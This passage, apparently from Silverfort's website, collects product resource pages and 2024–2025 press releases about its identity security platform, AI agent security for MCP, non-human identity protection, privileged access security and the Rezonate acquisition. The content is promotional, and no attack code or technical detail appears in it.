protect sensitive assets from breach and compromise Speakers Hed Kovetz, Silverfort Co-Founder and CEO Hed brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL. B. from Tel Aviv University. Gil Kirkpatrick, Chief Architect at Semperis Gil Kirkpatrick is an identity security veteran, and 15-time Microsoft MVP. Gil is Chief Architect at Semperis and previously held senior leadership positions at NetPro, Quest Software, and ViewDS Identity Solutions. He literally wrote the book on Active Directory Programming and is known as the founder of the Directory Experts Conference (later renamed The Experts Conference). He’s also a founding member of the Hybrid Identity Protection conference. --- - Published: 2020-03-12 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/secure-remote-access/ Silverfort enables frictionless secure authentication for any user, any device and any resource... Organizations are looking to enable employees to work remotely, outside of the formal office, for extended periods of time. Silverfort enables frictionless secure authentication for any user, any device andany resource, including MFA on-premise or in the cloud, without requiring any software agents,proxies or code changes. Download this brief to learn how Silverfort can: Secure remote authentication and access to any resource, including systems you couldn’t protect until today, like IT infrastructure, legacy and homegrown apps, file shares and more Enable Multi-Factor Authentication (MFA) for remote VPN access, SaaS applications and more Deliver holistic policy enforcement across all sensitive assets --- - Published: 2020-02-04 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/recorded-session-enabling-secure-authentication-and-zero-trust/ Dries Robberechts, Director of EMEA Sales explains how Silverfort enables secure authentication and Zero-Trust in in today’s perimeter-less networks Dries Robberechts, Director of EMEA Sales explains how Silverfort enables secure authentication and Zero-Trust in today’s perimeter-less networks Accelerate 19 session Silverfort enables adaptive multi-factor authentication for every sensitive user, device and asset across all environments. Seamlessly deployed, without any software agents or inline gateways, Silverfort allows security teams to protect corporate identities and critical assets, prevent data breaches and address compliance regulations. https://www. youtube. com/watch? v=bQw_yv-auLI --- - Published: 2020-02-03 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/secure-authentication-across-it-and-ot-networks/ Silverfort applies an innovative architecture and a powerful AI-driven risk engine to monitor, analyze and secure all authentication .... Secure Authentication Across IT and OT networks: Silverfort applies an innovative architecture and a powerful AI-driven risk engine to monitor, analyze and secure all authentication and access across the enterprise, including both IT and OT networks, without agents or proxies. Download this brief to: Learn how Silverfort can protect SCADA servers, HMIs and Workstations Understand the non-intrusive agentless proxyless architecture that enables it Review the different use cases that can be addressed with Silverfort --- - Published: 2019-02-10 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/silverfort-platform-integration-with-azure-active-directory/ Silverfort integrates with Azure Active directly to influence conditional access policies in Azure AD in real-time and to deliver unified authentication policies Silverfort integrates with Azure Active directly to influence conditional access policies in Entra ID (formerly Azure AD) in real-time and to deliver unified authentication policies. Silverfort also integrates with the Microsoft Security Graph API to share the Silverfort’s continuous AI-driven risk assessment with Microsoft and to can get risk indicators from Microsoft to apply intelligent security policies across the board. https://www. youtube. com/watch? v=A2ZMxPFsQmw --- - Published: 2018-11-28 - Modified: 2024-09-08 - URL: https://www.silverfort.com/resources/next-generation-authentication-for-financial-services/ Cybersecurity is a top concern for banks, insurance companies, investment funds and other... Download Silverfort solution brief for financial services: Silverfort’s agentless and holistic MFA platform monitors user access across all systems and environments and enforces adaptive AI-driven MFA, enabling financial organizations to mitigate threats in real-time and achieve compliance with PCI DSS, SWIFT CSP, NY-DFS, GDPR and more. . Download the brief to learn about: Agentless MFA for homegrown applications and legacy systems Holistic visibility and risk assessment AI-Driven authentication across all systems and environments Addressing compliance requirements with Silverfort --- --- ## News and press - Published: 2025-06-18 - Modified: 2025-06-18 - URL: https://www.silverfort.com/press-news/silverfort-unveils-ai-agent-security/ Identity and access security layer gives enterprises the confidence to rapidly and securely adopt AI agents and accelerate innovation Boston, MA — June 18, 2025, 9 a. m. ET — Today Silverfort, the leading identity security company, released its latest innovation, AI Agent Security. The new product empowers CISOs and their organizations to securely adopt AI by controlling what AI agents are allowed to access and protecting their identities. It keeps them governed, visible, and protected with the same rigor applied to human users. Trusted by more than 1,000 organizations, including many of the world’s largest enterprises, Silverfort has an advantage in solving this emerging need at enterprise scale. With Silverfort AI Agent Security, teams can tether every AI agent to a human identity, analyze its activity and the resources that it’s trying to access, and dynamically enforce access control policies to prevent misuse and data leakage. AI agents operate in a grey area between human and non-human identities, requiring purpose-built security to match their unique risks. AI agents act autonomously, make decisions, and access sensitive systems, frequently using delegated or privileged identities, which obscures accountability. Many organizations adopt the MCP protocol to allow AI agents to access corporate resources, but do so without a clear security framework, exposing critical systems to potential misuse. MCP enables highly dynamic, implicit access to internal resources based on model behavior. Without strict boundaries or observability, this can lead to unrestricted and unmonitored access across critical systems by AI agents that often act unpredictably. “The pressure to adopt AI is growing rapidly. CISOs and CIOs face a task that feels impossible—aggressively adopt AI, yet be sure to keep the company’s systems safe,” said Yaron Kassner, CTO and co-founder, Silverfort. “Today AI agents connect straight from the LLM into corporate data stores with limited visibility or guardrails. By treating AI agents as a new type of identity, and connecting them to their human owners, we create an audit trail of activity and accountability. Further, security teams can apply inline security controls they need to allow teams to innovate and accelerate AI adoption, without the fear of destruction to corporate data and reputation. ” Silverfort approaches securing AI agents the same way it secures human identities and service accounts: inline and in real time. Just as Silverfort protects authentication protocols like NTLM and OpenID Connect, it now protects MCP, too. Silverfort’s model ties every agent action to a real human owner, enforces least privilege, and logs an immutable audit trail. Sitting inline between the AI agent and the MCP server, Silverfort inspects every call before it reaches the target resource, protecting all corporate systems with robust, real-time security controls and preventing AI agents from going beyond their intended purpose and causing damage. Benefits include: Inline security controls: Dynamically grant or deny access of AI agents to MCP servers and other corporate systems, restricting over-privileged access. Control of AI tools: Approve how and when MCP servers & API tools are used. Accountability and auditability: Link every AI agent action to the initiating human for clear accountability and to create an audit trail. Stop AI agent overreach: Prevent misuse and data leakage, whether malicious or accidental. Make it impossible for AI agents to act outside of their original purpose, and for attackers to use them for lateral movement or privilege escalation. Combined with precise least-privilege access enforcement, AI agents are strictly limited to actions they are explicitly authorized to perform, so every decision aligns with both security policies and contextual relevance. Organizations can discover and classify AI agents, monitor their activity, and tie each one to a human owner. Designed for ease and quick deployments, Silverfort integrates with no impact to end users or the developers building the agents. Learn more about Silverfort AI Agent Security and see how to safely innovate with AI agents, without compromise. About Silverfort  Fueled by a belief that identity professionals deserve better, we found a way to break down the silos of identity security—eliminating the gaps and blind spots left behind by a patchwork of point solutions. The Silverfort Identity Security Platform is the first to deliver end-to-end identity security, protecting every identity in the cloud, on-prem, humans, machines, and everything in between. Our patented technology—Runtime Access Protection (RAP)—natively integrates with the entire IAM infrastructure, giving businesses visibility into all identities, analyzing every access, and extending active protection to resources that could not be protected previously—including NHIs, legacy systems, command line tools, and IT/OT infrastructure. It is easy to deploy and use, and doesn't disrupt business operations, resulting in better security outcomes with less work. Silverfort is the identity security platform that both identity and security professionals deserve, earning the trust of more than 1,000 leading organizations, including several Fortune 50 companies. Learn more at silverfort. com.   --- - Published: 2025-06-05 - Modified: 2025-06-05 - URL: https://www.silverfort.com/press-news/silverfort-appoints-howard-greenfield-president-and-cro/ Former CRO of SailPoint and Centrify joins Silverfort to support the company's rapid growth and identity security market leadership Boston, Mass. — June 5, 2025 — Silverfort, the leading identity security company, today announced the appointment of Howard Greenfield as President and Chief Revenue Officer (CRO). Greenfield brings extensive experience in Go-To-Market (GTM) leadership after successfully bringing multiple identity companies to scale, including taking SailPoint through its first IPO. Howard joins Silverfort after a milestone year, in which the company grew its customer base to more than 1,000 companies and expanded its offering through innovation and M&A to become the most complete identity security platform. Greenfield will lead Silverfort’s GTM strategy and execution, including global sales and marketing, and navigate the company’s next stage of growth to strengthen its market leadership. “Welcoming Howard to our leadership team, with his vast experience, vision, and operational rigor is truly a game-changer,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Market demand for identity security is skyrocketing, and Silverfort is scaling both its business and its platform at an unmatched pace, establishing itself as the leading identity security platform. With Howard’s deep understanding of the identity market and proven ability to scale companies to hundreds of millions in ARR, guiding them through significant milestones and achievements, his leadership will be instrumental as Silverfort expands. ”  Before joining Silverfort, Greenfield was an Operating Partner at venture capital firm Canaan, where he helped many portfolio companies with their GTM approach and was a key driver for several successful exits, such as Axis Security and MachEye. Prior to that, as CRO at Centrify, a Privileged Access Management (PAM) provider now known as Delinea, he led the sales, marketing, partner and customer success teams, growing revenues to culminate in a successful exit to private equity firm TPG. Earlier, Greenfield was the CRO at SailPoint, one of the world’s leading identity companies, where he was instrumental in rapidly growing ARR and expanding the customer base, positioning the company for a successful IPO in 2017. As President and CRO at Silverfort overseeing sales and marketing, Greenfield will create strong alignment and partnership between both departments, driving fast growth to elevate Silverfort’s position as the identity security market leader even further. Greenfield will also focus on expanding the Silverfort partner community and channel-first strategy, empowering partners to be trusted advisors in the emerging identity security market.   “Identity is central to every cybersecurity strategy, and what sets Silverfort apart is its distinctive end-to-end identity security platform approach, and unparalleled innovation,” said Greenfield. “I’m eager to join such a strong, engaged team—across executive leadership, investors, partners, customers, and employees—focused on scaling the business while staying true to the company’s culture. Maintaining exceptional customer retention and satisfaction, prioritizing collaborative teamwork, and continuously building innovative products that solve real problems in groundbreaking ways, Silverfort is uniquely positioned for long-term success as the Identity Security market leader. ”  This announcement comes on the heels of significant evolution and growth for Silverfort. Now a global organization with more than 450 employees worldwide, over 1,000 companies trust Silverfort to secure their identities— whether in the cloud, on-prem, humans, or machines. Already this year, Silverfort launched its new Privileged Access Security (PAS) offering which leverages unique technology, and expanded its Non-Human Identity (NHI) security offering to the cloud—following its acquisition of Rezonate and its integration into Silverfort’s platform in under six months. Fast Company also named Silverfort a 2025 Most Innovative Company under the security category. To learn more about Greenfield’s vision and strategy during this pivotal phase of company growth, check out his full fireside chat on the Silverfort blog. ###  About Silverfort   Fueled by a belief that identity professionals deserve better, we found a way to break down the silos of identity security—eliminating the gaps and blind spots left behind by a patchwork of point solutions. The Silverfort Identity Security Platform is the first to deliver end-to-end identity security, protecting every identity in the cloud, on-prem, humans, machines, and everything in between. Our patented technology—Runtime Access Protection (RAP)—natively integrates with the entire IAM infrastructure, giving businesses visibility into all identities, analyzing every access, and extending active protection to resources that could not be protected previously—including NHIs, legacy systems, command line tools, and IT/OT infrastructure. It is easy to deploy and use, and doesn’t disrupt business operations, resulting in better security outcomes with less work. Silverfort is the identity security platform that both identity and security professionals deserve, earning the trust of more than 1,000 leading organizations, including several Fortune 50 companies. Learn more at silverfort. com.   --- - Published: 2025-04-28 - Modified: 2025-04-28 - URL: https://www.silverfort.com/press-news/silverfort-expands-its-non-human-identity-nhi-security-offering/ Only Silverfort secures all human and non-human identities across all environments in a single platform—from workforce identities to workload identities, service accounts, access keys and tokens, whether on-prem, cloud-native or hybrid Stop lateral movement, discover & visualize connections between human and NHIs across hybrid environments, enforce service accounts protection, and get actionable remediation recommendations Boston, Mass. — April 28, 2025 — Silverfort, the leading identity security company, today introduced expanded protection of its non-human identity (NHI) security product to include cloud-based identities, covering NHIs in cloud identity providers, cloud infrastructure, and SaaS applications.  With this announcement, Silverfort successfully integrated capabilities inherited from the Rezonate acquisition in November 2024. Organizations can now turn to Silverfort to meet every identity security need from human to non-human across their hybrid environments—from cloud to on-prem.   NHIs are mission critical for business, but secured as an afterthought  NHIs—service accounts, API keys, tokens, service principals, IAM roles, certificates, secrets, and more—are the connective tissue in an organization’s network. They are the backbone of a modern organization’s processes, allowing applications to interact with one another, yet their security remains fragmented and misaligned with their critical role. Created to “set and forget,” NHIs are difficult to track, and securing them is often split into minor features across different platforms, creating security gaps and blind spots. 56% percent of organizations unknowingly sync their service accounts to their SaaS directory, increasing the attack surface by creating a multitude of dormant accounts in cloud identity management platforms. Excessive privileges, stale credentials, and lack of clear ownership make them prime targets for attackers and create compliance gaps. It’s estimated that NHIs outnumber human identities by at least 50 to one, and that gap is widening fast, fueled by the explosive growth of Generative AI and autonomous agents. Human identities often serve as the gateway to NHIs, which are a core component in an attacker’s kill chain. “Emerging NHI-focused vendors attempt to address the problem with bespoke, point solutions that tackle a small fraction of the issue. But attackers don’t think in fragments. They exploit the entire attack surface, searching for any weakness that grants them access. Point solutions fail to provide full visibility into human and non-human identities across resources, leaving organizations with blind spots and unprotected gaps,” said Roy Akerman, VP of Identity Security Strategy, Silverfort. “To effectively manage NHIs, organizations need cross-platform, hybrid support, and a platform that can do more than secure NHIs. Yes, NHIs are a challenge, but they are only one element in the broader identity security challenge. That’s why at Silverfort, we’ve integrated our NHI security offering into our broader platform, giving our customers visibility into and control over the entire attack surface—not just the NHI components. ”  Introducing the only identity security platform to cover both humans and NHIs across both cloud and on-prem For the last few years, Silverfort has been on a mission to solve the unmet need for a unified platform that could secure all identities across all environments. As part of this vision, the company acquired Rezonate in late 2024, an innovative cloud identity security company with offerings that span identity threat detection and response (ITDR), identity security posture management (ISPM), Identity Governance and Administration (IGA) and NHI security. By expanding its ability to secure cloud-based NHIs, Silverfort became the first company to provide seamless, scalable security for all human and non-human identities, both on-prem and in the cloud, from a single platform. With these capabilities, Silverfort has the power to map NHI effective privileges, activities, risk indicators and usage patterns. Using behavioral insights, Silverfort automatically generates policies that can halt lateral movement, blocking unauthorized access the moment an NHI deviates from its normal activity. Unlike traditional methods, Silverfort automatically determines the human ownership of each NHI, which makes it much easier to enforce accountability and streamline remediation. For faster deployments and easy ongoing maintenance, Silverfort integrates with existing identity infrastructure, from Active Directory to Entra ID, from AWS to Azure, from GitHub to Snowflake, providing cross-platform protection that spans hybrid environments, leaving no identity unprotected.   Key benefits include:  Unified coverage for human identities and NHIs, both on-prem and in the cloud: Integrate intelligence from cloud and on-prem into a unified interface to secure all human and non-human identities, eliminating silos and enabling streamlined security operations. Complete discovery and ownership mapping: Discover and classify non-human identities— from on–prem Active Directory service accounts, to NHIs in cloud identity providers, cloud infrastructure, and SaaS applications. Conduct ownership mapping, view effective privileges, and eliminate redundant or excessive permissions . Proactive NHI security posture management: Use cross-platform context to analyze activity, risk indicators, ownership, misconfigurations, and usage patterns. Enhance overall NHI security posture with actionable insights into dormant, exposed, unrotated and other at-risk NHIs and remediation recommendations. Prevention of lateral movement and real-time protection of Service Accounts: Real-time enforcement of ’Virtual Fencing’ for all Active Directory service accounts, to block any use of the account outside of its intended purpose, making lateral movement impossible.  Automate protection of large numbers of service accounts with Silverfort’s Smart Policy, scaling and streamlining enforcement across large, complex environments. The Silverfort Identity Security Platform  With identity security as Silverfort's sole focus and mission, the company pioneered a way to deliver end-to-end identity security—securing every dimension of identity via its patented technology, Runtime Access Protection (RAP). RAP natively integrates into an enterprise's identity infrastructure to extend protection to previously "unprotectable" assets like non-human identities (NHIs), legacy systems, command line tools, IT/OT infrastructure and more. The result is identity security with end-to-end visibility and active protection—with minimal disruption to users or administrators. More than 1,000 enterprises including UPS, Airbus, and Kayak trust Silverfort to protect their identities.  This involves analyzing and verifying over 10 billion authentications daily and deploying 17x faster than traditional identity security solutions for a better time to value. In the last year, Silverfort raised $116M in Series D funding, introduced Privileged Access Security (PAS), and launched its Identity-First Incident Response solution. Additionally, Fast Company named Silverfort a 2025 Most Innovative Company, listed in the security category alongside others who are pushing the boundaries of what’s possible to create a more secure world. Silverfort will be at the RSAC™ Conference at booth number #3404. Learn more at RSA, book a demo to see Silverfort NHI Security in action, or visit Silverfort NHI Security for more details.   ###  About Silverfort   Fueled by a belief that identity professionals deserve better, we found a way to break down the silos of identity security—eliminating the gaps and blind spots left behind by a patchwork of point solutions. The Silverfort Identity Security Platform is the first to deliver end-to-end identity security, protecting every identity in the cloud, on-prem, humans, machines, and everything in between. Our patented technology—Runtime Access Protection (RAP)—natively integrates with the entire IAM infrastructure, giving businesses visibility into all identities, analyzing every access, and extending active protection to resources that could not be protected previously—including NHIs, legacy systems, command line tools, and IT/OT infrastructure. It is easy to deploy and use, and doesn’t disrupt business operations, resulting in better security outcomes with less work. Silverfort is the identity security platform that both identity and security professionals deserve, earning the trust of more than 1,000 leading organizations, including several Fortune 50 companies. Learn more at silverfort. com.   --- - Published: 2025-02-27 - Modified: 2025-02-27 - URL: https://www.silverfort.com/press-news/silverfort-stakes-its-claim-in-the-identity-security-market-with-patented-architecture-and-rebrand/ Introducing Runtime Access Protection (RAP) enabling the first end-to-end identity security platform, securing every identity across hybrid environments and disrupting siloed categories like NHI, PAM, MFA, ITDR and ISPM. New brand signals Silverfort’s next chapter of innovation and growth in identity security Boston, Mass. — February 27, 2025 — Silverfort, the leader in end-to-end identity security, reveals details about its patented Runtime Access Protection (RAP) technology while simultaneously unveiling its new brand. Powering the Silverfort Identity Security Platform, RAP brings identity security to systems and environments that couldn’t be protected before, breaks down silos, eliminates blind spots, and gives organizations actionable visibility into their entire identity fabric–in the cloud or on-premises, human or machine–for the very first time. Trusted by leading enterprises worldwide—Airbus, Rio Tinto, Coop, Kayak, Ryanair, Channel 4, Swiss Automotive Group, Singtel, amongst others—Silverfort analyzes and verifies over five billion authentications daily, detecting an average of 34K identity exposures and threats per customer. The platform deploys 17x faster than traditional identity security solutions, for a better time to value. Identity represents the weakest link in enterprise security, with compromised credentials accounting for 80% of all breaches. For years, enterprises managed identity through a patchwork of on-prem identity management tools, one or more cloud identity providers (IdPs), and a mix of bespoke identity security solutions. Tools were built in silos—many long before cloud infrastructure and modern attack techniques existed—creating critical security gaps and access blind spots. The rise of AI and machine identities exacerbate the problem. This outdated approach forces enterprises to compromise on either security or usability—rarely can they achieve both. Active identity protection is no longer optional—it's critical to the health of a company's cybersecurity program," said Rob Ainscough, Chief Identity Security Advisor at Silverfort and former Head of Identity & Access Management at Tesco. "Enterprises need a solution that can surface every identity—even their unknowns—so they have a foundational understanding of what's in their environment. From there, the solution should deliver protection and controls at scale. Legacy solutions provide incremental protections that take too long to implement and lack sufficient coverage leaving the door open to attackers. With its unique technical architecture at its foundation, Silverfort is the only player in the identity security market equipped to discover every identity and extend real-time protection across complex, hybrid environments, and resources. "  A deeper look at Silverfort's innovation: Runtime Access Protection  With identity security as Silverfort's sole focus and mission, the company pioneered a way to deliver end-to-end identity security—securing every dimension of identity via its patented technology, Runtime Access Protection (RAP). RAP natively integrates into an enterprise's identity infrastructure to secure it from within. It removes the complexity of securing every identity and extends protection to previously "unprotectable" assets like non-human identities (NHIs), legacy systems, command line tools, IT/OT infrastructure and more. Once integrated into an organization's Identity Access Management (IAM) infrastructure, RAP forwards a user's access request to Silverfort for analysis and triggers inline security controls if needed. Silverfort sends its verdict to the IAM infrastructure to grant or deny access. The result is identity security with end-to-end visibility and active protection—with minimal disruption to users or administrators. “For years, enterprises have struggled with a patchwork of on-prem identity tools, multiple cloud IdPs, and fragmented security solutions—which are built in silos, missing the bigger picture, and leaving many critical assets exposed,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “The result? Security gaps, access blind spots, and a lack of unified control. To make matters worse, identity security remains a shared responsibility across multiple teams, each with different authority and priorities, making real progress nearly impossible. We’re changing that. We built the identity security platform the industry deserves—one that IAM teams can operate with ease and security teams can trust. No more silos. No more blind spots. This is identity security done right. ” A New Brand for a new era of identity security without limits  Along with revealing details about its innovative technology, Silverfort simultaneously unveils its bold new brand, including an entirely new look. For Silverfort, identity security isn’t just a feature—it’s the heart of the company’s mission. Fueled by the belief that identity and security teams deserve better, the company’s founders discovered a way to deliver end-to-end identity security that goes further than any other solution available today. The new brand comes as the company evolves into a global organization with more than 450 employees worldwide, trusted by more than 1,000 companies. 2024 was a year of explosive growth and innovation. In the last year, Silverfort raised $116M in Series D funding, introduced Privileged Access Security (PAS), launched its Identity-First Incident Response solution, and addressed the gap in unified identity security for cloud environments with the acquisition of Rezonate. Today, Silverfort is the first to deliver a complete identity security platform protecting human and machine identities across on-prem assets, cloud identity providers, cloud infrastructure, and SaaS applications. To learn more about identity protection and Silverfort's Identity Security Platform powered by Runtime Access Protection, visit www. silverfort. com/platform and request a demo today. ###  About Silverfort  Fueled by a belief that identity professionals deserve better, we found a way to break down the silos of identity security—eliminating the gaps and blind spots left behind by a patchwork of point solutions. The Silverfort Identity Security Platform is the first to deliver end-to-end identity security, protecting every identity in the cloud, on-prem, humans, machines, and everything in between. Our patented technology—Runtime Access Protection (RAP)—natively integrates with the entire IAM infrastructure, giving businesses visibility into all identities, analyzing every access, and extending active protection to resources that could not be protected previously—including NHIs, legacy systems, command line tools, and IT/OT infrastructure. It is easy to deploy and use, and doesn’t disrupt business operations, resulting in better security outcomes with less work. Silverfort is the identity security platform that both identity and security professionals deserve, earning the trust of more than 1,000 leading organizations, including several Fortune 50 companies. Learn more at silverfort. com. --- - Published: 2024-12-09 - Modified: 2025-02-26 - URL: https://www.silverfort.com/press-news/silverfort-unveils-privileged-access-security/ The newest product is the first to provide seamless discovery, classification, and enforcement of security controls for all privileged accounts, overcoming barriers that traditional Privilege Access Management (PAM) solutions do not offer Gartner Identity & Access Management Summit, Grapevine, Texas & Boston, Mass. — December 9th, 2024 — Silverfort, the leading unified identity security company, today announced the launch of Privileged Access Security (PAS), a new way to secure privileged accounts faster and easier than ever before. Silverfort’s PAS product discovers, classifies, and protects privileged accounts end-to-end by operating from within the Identity and Access Management (IAM) infrastructure itself. This results in rapid time-to-value and far broader protection that will not leave any privileged account behind. PAS can operate as a layer on top of any existing PAM solution, or as an alternative in places where PAM is too complex or expensive to implement. Unlike traditional PAM deployments that take months or even years, Silverfort’s PAS can be implemented and activated within days, allowing companies to effectively address security and compliance gaps while saving significant time and costs. The identity security problem is rapidly escalating out of control: 8 out of 10 breaches leverage compromised identities and credentials, taking advantage of the countless silos and blind spots that the typical enterprise identity infrastructure suffers from. Privileged accounts—which have broad access permissions to sensitive information and can cause massive damage—are naturally the ones most targeted by attackers, yet many of them go unaccounted for and are not adequately secured. The rise of adversarial AI will only accelerate the rate of attacks, and their sophistication increases the threat to privileged accounts. Existing PAM solutions offer valuable security controls yet struggle to defend against today’s threats effectively because they require lengthy and complex deployments, rely on manual discovery and onboarding, and allow admins and attackers to bypass them easily. Only 10. 2% of organizations are able to bring their PAM onboarding project to the finish line. As a result, organizations are searching for new solutions that will provide broader and stronger security while requiring less time and effort to implement and use. “Securing privileged access has been one of the biggest challenges of the cybersecurity industry for decades, and solving it effectively in today’s hybrid and complex enterprise environments pushed us to innovate and break free from the old limitations,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “We heard from many organizations about the same gaps that make their current PAM solutions too slow to implement and too narrow to stop today’s threats and eventually found an innovative way to overcome these barriers. Our new PAS offering can operate on top of any existing PAM solution or as an alternative in places where PAM isn’t implemented. In both cases, it provides broader coverage, adds new security controls designed to stop modern threats, and dramatically reduces time-to-value from years to days. ” “Managing privileged accounts is table stakes. The problem, however, is that the current set of solutions tends to be extremely manual, take forever to implement, and can’t really help you find your unknowns,” said Rob Larsen, the former Chief Security Architect at GM & Silverfort Advisor. “With Silverfort’s unique technology, they’ve found an elegant, lightweight way for customers to discover unknown privileged accounts, tier them, and then secure them. ” Key capabilities of Silverfort’s Privileged Access Security offering: Automate privileged account discovery and classification: Automatically and continuously discover all privileged accounts based on their attributes and activity — including ones they didn’t know existed and no other solution could uncover. In addition, the new technology identifies privilege tiers and any misuse of privileged accounts outside of their permitted purpose, to help eliminate potential exposures. Enforce Least Privilege to prevent lateral movement and ransomware propagation: Take a Zero-Trust approach and prevent any misuse of privileged accounts, by automatically mapping where each account is being used and blocking access attempts that deviate from the account’s intended purpose. Implement frictionless Just-In-Time (JIT) access at scale: Apply Just-In-Time Access to any account with a single click, without requiring onboarding efforts and without changing how admins work. PAS introduces a better, easier, and faster way to achieve Zero Standing Privileges at scale. Deploy and implement rapidly in days, not years: Silverfort's unique architecture enables incredibly fast time to value by enforcing security controls on top of the customer’s existing identity infrastructure. Rapidly address security gaps, compliance needs, and cyber insurance requirements, while saving implementation costs and often reducing insurance premiums. One Platform to Protect All Identities, Including Privileged Accounts Silverfort's technology offers a unique and significant advantage over all other identity security providers, with its ability to seamlessly enforce security controls on top of the customer's existing identity infrastructure, including Active Directory, Entra ID, Okta, Ping, and many other IAM solutions. This enables Silverfort to secure all enterprise assets, including ones that no other vendor can protect, such as legacy systems, command-line interfaces, and IT/OT infrastructure. Silverfort’s customers enjoy the benefits of having a single platform protecting their identities from compromise across all on-prem and cloud environments. The launch of PAS comes on the heels of Silverfort’s acquisition of Rezonate, an innovator in Identity Security for cloud environments, and its $116M Series D funding in January 2024. The company continues to scale the business with over 100% year-over-year (YoY) growth, adding more than 100 new customers each quarter, including several Fortune 50 companies that trust Silverfort to protect their corporate identities. Book a meeting with us at the Gartner IAM Summit in Grapevine, TX, December 9-11, or visit booth #441. ### About Silverfort Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere. We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Partner of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www. silverfort. com or on LinkedIn. About Gartner Identity & Access Management Summit Gartner analysts will provide additional analysis on identity and access technologies and strategies at the Gartner Identity & Access Management Summit taking place December 9-11 in Grapevine. Follow news and updates from the conferences on X using #GartnerIAM. --- - Published: 2024-11-13 - Modified: 2025-02-26 - URL: https://www.silverfort.com/press-news/silverfort-acquires-rezonate-to-deliver-the-first-complete-identity-security-platform/ With Rezonate’s acquisition, Silverfort continues to break down identity security silos across all enterprise environments, on-prem and in the cloud, for both human and non-human identities (NHIs), offering better and easier identity security from a single platform for its rapidly growing customer base November 13, 2024 — Boston, MA — Today, Silverfort, the leading identity security company, announced the acquisition of Rezonate, an innovator in identity-first security for cloud environments. Committed to providing the industry’s most complete identity security platform, the consolidated offering will strengthen and expand Silverfort's ability to protect identities across all on-prem assets, cloud identity providers, cloud infrastructure, and SaaS applications. The combined offering, fully integrated into Silverfort’s platform, will be available in mid-2025. Consolidating Identity Security Silos and Eliminating Blind Spots  Today's organizations realize identity security isn't just an element of cybersecurity—it creates the most essential conditions required for success. Identity has become the primary attack vector, driving accelerated market demand for security solutions that put identity at the center. Yet, most identity solutions solve it only partially—they focus on either cloud or on-prem, or on a specific element of identity security; for example, Identity Threat Detection and Response (ITDR), Privileged Access Management (PAM) or Non-Human Identities (NHI). This approach creates security silos and blind spots, leading to ongoing exposure to identity-based attacks.   Integrating Rezonate's unique cloud-focused capabilities into Silverfort's Unified Identity Security Platform creates the broadest and most complete identity security offering on the market. Creating a shared security layer across all enterprise identities and collapsing the existing silos provides complete visibility and context for intelligent decision-making and more effective real-time security controls. Customers can now turn to Silverfort to solve every identity security need across any enterprise environment, yielding stronger security, easier deployments, and better operational efficiencies.   “After being neglected for years, identity security is becoming the most important element of cybersecurity. We couldn't be more excited to join Silverfort, as our mutual goal is to solve this difficult problem," said Roy Akerman, CEO and Co-Founder of Rezonate. "Silverfort built a powerful and innovative platform, an amazing team and culture, and is on a clear path to market leadership. We can't wait to join Silverfort and grow this platform to its full potential together. " Rapid Growth for Unified Identity Security   Silverfort experienced rapid growth over the past several years, adding more than 100 new customers each quarter, including some of the largest enterprises in the world, and consistently growing its revenues by more than 100% year over year. After raising $116M in Series D funding earlier this year, the company is moving swiftly towards delivering its unified identity security platform vision. "Both the technology built by the Rezonate team and the people themselves are extremely impressive,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Rezonate offers the broadest set of cloud identity security capabilities that we have seen from a startup of their size, covering NHI, ISPM, ITDR, entitlements and more across every cloud asset. Rezonate's innovative architecture also enables them to flex and scale to meet every customer's needs, with unmatched speed and simplicity—and customers love them for it. We're excited to join forces with Rezonate to empower every business to defend against the evolving identity threat landscape. ”  Stronger Together: One Platform to Protect All Enterprise Identities  Silverfort's technology offers a unique and significant advantage over all other identity security providers, with its ability to seamlessly enforce security controls on top of the customer's existing identity infrastructure, including Active Directory, Entra ID and many other IAM solutions. It secures vulnerable enterprise assets that no other vendor is able to protect, such as legacy systems, command-line interfaces, and IT/OT infrastructure. With the addition of Rezonate's capabilities, Silverfort extends its reach deeper into cloud applications, workloads and infrastructure, with a broad set of capabilities, including Non-Human Identity (NHI) security, Identity Threat Detection and Response (ITDR), Identity Security Posture Management (ISPM), Entitlement Management and more—paving the way for a more secure future and giving organizations one platform to secure all their identities. Customers will enjoy the benefits of having a single platform to protect their identities from compromise across all their on-prem and cloud environments. Benefits include:  Stronger protection with unified context: Stop identity threats on-prem, in the cloud, and anywhere in between with the most comprehensive view of all identities and access activity across an organization. One place for all identity security: Solve the entire identity security journey from a single platform, including discovery of hidden assets and exposures, prevention measures to reduce the attack surface, detection of identity threats, and real-time response that stops the threat before it can cause damage. Protecting every asset, including ‘unprotectable’ ones: Enable protection for any type of asset, both on-prem and in the cloud, including sensitive systems that cannot be protected by any other vendor, such as legacy systems, critical infrastructure, command-line interfaces and more. Rapidly deploy and scale: Achieve identity security across the entire organization within days to easily address compliance gaps and cyber insurance requirements, while saving significant time and cost. Read more about why Silverfort acquired Rezonate in the blog by Silverfort’s CEO. About Silverfort  Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere. We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft’s Zero Trust Partner of the Year. Hundreds of the world’s leading enterprises trust Silverfort to be their identity 